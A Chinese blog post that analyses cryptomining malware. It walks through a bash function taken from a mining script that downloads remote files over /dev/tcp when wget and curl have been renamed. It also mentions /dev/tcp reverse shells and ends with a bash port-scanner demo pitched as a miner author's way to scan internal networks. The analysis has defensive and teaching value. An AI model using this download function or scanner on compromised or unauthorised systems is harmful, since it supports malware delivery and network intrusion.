最近在分析挖矿木马,发现挖矿木马在入侵后都会对系统自带的部分命令进行替换或劫持。最常见的就是将 wget 和 curl 命令重命名。在多个挖矿木马同时竞争的情况下,没有 wget 和 curl 该如何远程下载挖矿脚本呢?
直接看挖矿脚本是如何实现的。这里面涵盖了很多知识点,非常值得学习!
function DOWNLOAD() {
read proto server path <<< "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
}
为更好分析是如何实现下载的,我们用 bash -x 来执行脚本打印中间过程。这段shell脚本只是把远程服务器上的文件内容输出到屏幕,如果要写入文件可以用重定向符追加到文件。
用 read 读取第一个参数 url 解析赋值得到 path,server 和 port
然后判断 host 和 port 的值是否相等。因为请求的 url 中可能不会带有端口号,此时匹配值就是相同的,该条件为真时就默认 port 为 80 端口。
有人会提问说:要按照上面的代码要请求是 https也默认80端口不就报错了吗?
是的,这样只能实现最简单的 http 的请求,https 涉及到证书密钥的传输,实现起来过于复杂。在极端场景下,能实现 http 下载已经可以了。
为什么我上图中 url 参数用的 https 为何也请求成功了?
因为我博客同时允许了 http 和 https 共存,实际上面请求还是用的 http 协议(我也是后面才发现的),如果没有允许 http 协议这里就会报错。
[[ x"${HOST}" == x"${PORT}" ]] 为什么这个判断前面都要加个x呢?
示例:
if [ "x${var}" == "x" ]
if [ x"$DPVS_TYPE" == x"SNAT" ]
目的:防止出现语法错误。
因为如果不写 x,只用 if [ "${var} == "0" ] 来判断 ${var} 的值; 当 ${var} 为空或未设置时,语句被解释为 if [ == "0" ],出现语法错误。加上 x 后,当 ${var} 为空或未设置时,解释为 if [ "x" == "x" ] ,依然正确。
所以:if [ "x${var}" == "x" ] 整句的意思是判断 ${var} 是否为空。
解释下 exec 3<>/dev/tcp/${HOST}/$PORT 的含义。
看到 /dev/tcp/${HOST}/$PORT 的第一反应就是想到用 bash 反弹 shell,不知道做安全的小伙伴是不是这种感觉。
在 Bash Shell 中打开或关闭 TCP/UDP 套接字
可以使用 bash shell 中的以下语法打开 TCP/UDP 套接字。
$ exec ${file-descriptor} </dev/${protocol}/${host}/${port}
"文件描述符" 是与每个套接字相关联的唯一的非负整数。文件描述符0,1和2分别保留给 stdin,stdout 和 stderr。因此必须指定3或更高(以未使用者为准)作为文件描述符。
"<>"意味着套接字对于读写都是打开的,根据需要,可以打开只读(<)或只写(>)的套接字。"协议"字段可以是 tcp 或 udp
打开后,可以使用以下语法关闭读/写套接字。
$ exec ${file-descriptor} <& – //关闭输入连接
$ exec ${file-descriptor}>& – //关闭输出连接
其中 echo 使用了 e n 两个参数:
-e:开启转义
-n:默认echo会在最后输出最后加上一个\n换行,使用了该参数后就不会自动加上换行
因为在标准 http 协议中header和body是用 \r\n\r\n 分隔开的。
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
-r 屏蔽 \,如果没有该选项,则 \ 作为一个转义字符,有的话 \ 就是个正常的字符了。
这里就是按行读取 header 部分,匹配到 \r 就停止读取了。
shell – IFS 分隔符,IFS 是 internal field separator 的缩写,shell 的特殊环境变量。ksh 根据 IFS 存储的值,可以是空格、tab、换行符或者其他自定义符号,来解析输入和输出的变量值。
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
read -d 后面跟一个标志符,其实只有其后的第一个字符有用,作为结束的标志。
这里就是读取 body 部分。exec 3>&- 关闭输出 fd3
短短几行 shell 代码就实现了 linux 的下载功能。并且这里下载需要将结果追加到文件。
下载文件并解压成功
举一反三:
既然在没有 curl 和 wget 的情况下用 shell 实现了下载,那么同样可以借此实现其他功能。
思考一个场景,如果我是挖矿木马的开发者,在内网的情况下没法下载扫描工具的源码(如 masscan)进行编译时候可以用同样的方式来扫描内网呢?
下面是我的思路,一个简单的 demo:
#!/bin/bash
host=$1
port_first=1
port_last=65535
for ((port=$port_first; port<=$port_last; port++))
do
$(echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open"
done
本文作者:Zgao
原文地址:https://zgao.top/linux在没有curl和wget的情况下如何用shell实现下载功能/